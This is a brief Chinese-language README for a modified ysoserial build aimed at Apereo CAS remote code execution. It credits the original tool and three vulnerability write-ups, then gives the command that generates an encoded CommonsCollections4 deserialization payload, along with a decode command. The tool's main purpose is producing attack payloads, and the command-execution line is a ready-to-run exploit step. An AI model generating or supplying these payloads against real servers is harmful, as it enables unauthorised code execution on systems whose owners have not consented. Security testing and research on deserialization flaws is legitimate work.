工具源码来源于
https://github.com/frohoff/ysoserial
改造思路来源于
https://www.00theway.org/2020/01/04/apereo-cas-rce/
https://www.anquanke.com/post/id/198842
https://www.freebuf.com/vuls/226149.html
命令执行:
java -jar ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar encode CommonsCollections4
CommonsCollections4 这个payload可以自行修改,选项可参考ysoserial的用法
检测:
java -jar ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar decode base64string 1.txt